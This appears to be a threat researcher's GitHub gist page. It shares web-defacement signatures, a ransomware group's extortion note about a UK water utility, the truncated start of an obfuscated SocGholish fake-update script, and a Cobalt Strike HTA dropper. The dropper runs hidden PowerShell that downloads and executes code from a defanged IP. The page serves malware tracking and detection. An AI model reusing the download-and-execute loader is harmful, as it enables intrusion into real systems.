Skip to content

Instantly share code, notes, and snippets.

@BushidoUK
BushidoUK / Tracking web defacements.txt
Created November 26, 2022 13:35
Using Shodan and URLscan to track web defacements
Hacked By ./EcchiExploit
2E4H - BHIOFF - Manusia Biasa Team
BhiOfficial
Banyumas Cyber Team
sayahekwr@protonmail.com
LulzGhost Team
Manusia Biasa Team
http.html:"EcchiExploit"
@BushidoUK
BushidoUK / Message from CL0P Leaks
Created August 15, 2022 19:31
A UK Water Utility was apparently hit by the CL0P group, this was the message on their .onion Tor site
Website:
www.thameswater.co.uk
Revenue:
$2 billion
Thames Water supply much of critical water services to people and companies.
This company is public and this mean not only they bring water and sewage services to millions of people they also allow many people and company to invest with their stock offering.
Companies like this have much responsibility and we contact them and tell them that they have very bad holes in their systems. ALL SYSTEMS.
We spent months in the company system and saw first hand evidence of very bad practice.
@BushidoUK
BushidoUK / AutoUpdate JS
Created August 9, 2022 09:45
SocGholish JavaScript Fake Browser Update
(function(_0x25cba2, _0x45eb40) {
var a0_0x501b44 = {
_0x17e23d: 0x38,
_0x205270: 'CuXi',
_0x4af451: 0x55,
_0x3d4924: 0x44,
_0x2c4ea4: 0x28,
_0x561b2d: 'Sg20',
_0x5656b1: 0x37,
_0x3c1bf0: 'Urg4',
@BushidoUK
BushidoUK / Docs_password HTA
Created August 8, 2022 20:39
Cobalt Strike VBS disguised as HTA file
<script language="VBScript">
Function dl()
Dim var_shell
Set var_shell = CreateObject("Wscript.Shell")
var_shell.run "powershell -c $s1='IE';$s2='X(New-Object Net.WebClie';$s3='nt).Downlo';$s4='adString(''hxxp://159.223.37[.]182/update'')';IEX ($s1+$s2+$s3+$s4)", 0, true
End Function
dl